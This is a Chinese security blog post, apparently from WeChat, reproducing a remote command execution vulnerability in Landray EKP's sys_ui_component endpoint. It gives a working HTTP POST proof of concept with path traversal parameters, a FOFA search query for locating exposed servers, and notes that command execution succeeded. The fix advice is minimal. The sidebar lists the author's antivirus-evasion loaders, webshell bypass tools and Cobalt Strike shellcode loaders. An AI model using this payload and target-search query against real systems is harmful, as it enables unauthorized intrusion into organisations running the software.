首页 时事 民生 政务 教育 文化 科技 财富 体娱 健康 情感
更多
旅行 百科 职场 楼市 企业 乐活 学术 汽车 时尚 创业 美食 幽默 美体 文摘

2024HW 蓝凌 ekp sys_ui_component 远程命令执行漏洞复现

文摘   科技   2024-08-01 16:57   陕西  

免责声明

     请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。



01
0x01漏洞描述
      蓝凌 EKP sys_ui_component 远程命令执行漏洞,攻击者可通过此漏洞上传恶意脚本文件,对服务器的正常运行造成安全威胁。

02
0x02 漏洞复现 
POC如下所示:
POST /sys/ui/sys_ui_component/sysUiComponent.do HTTP/1.1Host:xx.xx.xx.xxAccept:application/json,text/javascript,*/*;q=0.01Accept-Encoding:gzip,deflateAccept-Language:zh-CN,zh;q=0.9,en;q=0.8Connection:closeContent-Type:multipart/form-data; boundary=----WebKitFormBoundaryL7ILSpOdIhIIvL51User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/83.0.4103.116Safari/537.36X-Requested-With:XMLHttpRequestContent-Length: 395
------WebKitFormBoundaryL7ILSpOdIhIIvL51Content-Disposition:form-data;name="method"
replaceExtend------WebKitFormBoundaryL7ILSpOdIhIIvL51Content-Disposition:form-data;name="extendId"
../../../../resource/help/km/review/------WebKitFormBoundaryL7ILSpOdIhIIvL51Content-Disposition:form-data;name="folderName"
../../../ekp/sys/common------WebKitFormBoundaryL7ILSpOdIhIIvL51--
exp
后台回复:"蓝凌exp" 获取

03
0x03 复现过程

fofa:icon_hash="831854882"

页面是这个样子的:

使用poc:

执行命令dir:

04
0x04 修复建议


1、请联系厂商进行修复。2、如非必要,禁止公网访问该系统。3、设置白名单访问。

END
点击蓝字  关注我们

 http://mp.weixin.qq.com/s?__biz=MzkwOTIzODg0MA==&mid=2247491058&idx=1&sn=ad452e61076130623951ff7476882954
爱喝酒烫头的曹操
主要分享一些漏洞挖掘小技巧,代码审计、web安全、内网渗透以及一些实战案例、快速获得edu及cnvd漏洞报送证书小技巧。
 最新文章
【BUG修复】无需白加黑 单文件一键击溃360核晶 v1.2版本发布!
【补齐最后短板】单文件一键击溃windows defender进程
【免杀】单文件一键击溃火绒进程
【免杀】原来SQL注入也可以绕过杀软执行shellcode上线CoblatStrike
支持自定义密码 | 哥斯拉免杀 过360、火绒、D盾 XlByPassGodzilla v1.3已更新!
【免杀】向日葵密码、todesk密码命令行版本一键提取工具
【免杀】一款绕过杀软将Windows权限提升至SYSTEM工具
【正向代理】基于suo5二开 过D盾、安全狗、360、火绒的Xlsuo5 v1.0已发布!
【免杀】冰蝎免杀 XlByPassBehinder 过360、火绒、微软 v1.2已更新!
【免杀】一键禁用Windows Defender
【免杀】过360核晶 火绒 添加用户、运行mimikatz、上线CS的万能加载器XlAnyLoader正式发布!
【干货】你不得不学习的内网渗透手法
【免杀】R3用户层一键击溃360+核晶
【免杀】基于fscan 过360核晶、火绒的xlscan v1.2 介绍!
【正向代理】基于Neo-reGeorg过D盾、安全狗、360、火绒的Xl-Neoreg v1.1已更新!
【免杀】JSP文件加载shellcode自动化实现CobaltStrike上线
【免杀】一种新型反微步云沙箱技术
【免杀】CobaltStrike4.9.1二开 | 自破解 免杀 修复BUG
【免杀】ASPX文件加载shellcode实现CobaltStrike上线
【免杀】CS插件一键自动化生成免杀马
【国庆抽奖送现金】星落安全国庆活动发布!
【免杀】蚁剑 | 哥斯拉免杀 过雷池、D盾、安全狗的 XlByPassWAF 正式发布!
【版本更新】导出 Lsass.exe 内存工具 过360 火绒 微软 xlrls v1.1发布!
SRC安全知识库,发车!
【工具】cs免杀加载器 过360核晶、火绒 正式发布!
【文末抽奖送现金】免杀星球中秋活动介绍
【完整版】哥斯拉免杀 过360、火绒、微软 XlByPassGodzilla v1.2已更新!
【免杀】冰蝎免杀 XlByPassBehinder 过360、火绒、微软 已更新!
【免杀】冰蝎webshell免杀生成 XlByPassBehinder过360、火绒、微软正式发布!
【0day】全程云OA UploadEditorFile 存在文件上传漏洞
【免杀】基于fscan过360、火绒、Defender、卡巴斯基的xlscan正式发布!
【指纹已提取】泛微 e-cology v10 存在远程代码执行漏洞
微信小程序11177版本开启控制台方法
某中医药大学xx学院漏洞挖掘
某学院从小程序到教务系统的一次完整渗透
某大学CMS系统通杀之 SQL注入绕过
网神 SecGate3600-A1500权限绕过漏洞复现
Apache OFBiz (CVE-2024-38856) 漏洞复现
LiveBOS UploadFile.do任意文件上传漏洞
2024HW 蓝凌 ekp sys_ui_component 远程命令执行漏洞复现
智慧校园(安校易)管理系统文件上传漏洞复现
英飞达医学影像存档与通信系统任意文件上传
【1day】美特crm 任意文件上传漏洞复现
指挥调度管理平台 ajax_users.php SQL注入
【1day】红海云EHR任意文件上传漏洞复现
瑞友天翼应用虚拟化系统appsaveSQL注入
用友GRP A++Cloud 政府财务云 任意文件读取漏洞复现
用友畅捷通T+ keyEdit sql注入漏洞复现
用友-U8C-Cloud upload sql注入漏洞复现
【1Day复现】某可视化融合指挥调度平台多接口存在任意文件上传漏洞
 分类
时事
民生
政务
教育
文化
科技
财富
体娱
健康
情感
旅行
百科
职场
楼市
企业
乐活
学术
汽车
时尚
创业
美食
幽默
美体
文摘
 原创标签
时事 社会 财经 军事 教育 体育 科技 汽车 科学 房产 搞笑 综艺 明星 音乐 动漫 游戏 时尚 健康 旅游 美食 生活 摄影 宠物 职场 育儿 情感 小说 曲艺 文化 历史 三农 文学 娱乐 电影 视频 图片 新闻 宗教 电视剧 纪录片 广告创意 壁纸头像 心灵鸡汤 星座命理 教育培训 艺术文化 金融财经 健康医疗 美妆时尚 餐饮美食 母婴育儿 社会新闻 工业农业 时事政治 星座占卜 幽默笑话 独立短篇 连载作品 文化历史 科技互联网
 发布位置
广东 北京 山东 江苏 河南 浙江 山西 福建 河北 上海 四川 陕西 湖南 安徽 湖北 内蒙古 江西 云南 广西 甘肃 辽宁 黑龙江 贵州 新疆 重庆 吉林 天津 海南 青海 宁夏 西藏 香港 澳门 台湾 美国 加拿大 澳大利亚 日本 新加坡 英国 西班牙 新西兰 韩国 泰国 法国 德国 意大利 缅甸 菲律宾 马来西亚 越南 荷兰 柬埔寨 俄罗斯 巴西 智利 卢森堡 芬兰 瑞典 比利时 瑞士 土耳其 斐济 挪威 朝鲜 尼日利亚 阿根廷 匈牙利 爱尔兰 印度 老挝 葡萄牙 乌克兰 印度尼西亚 哈萨克斯坦 塔吉克斯坦 希腊 南非 蒙古 奥地利 肯尼亚 加纳 丹麦 津巴布韦 埃及 坦桑尼亚 捷克 阿联酋 安哥拉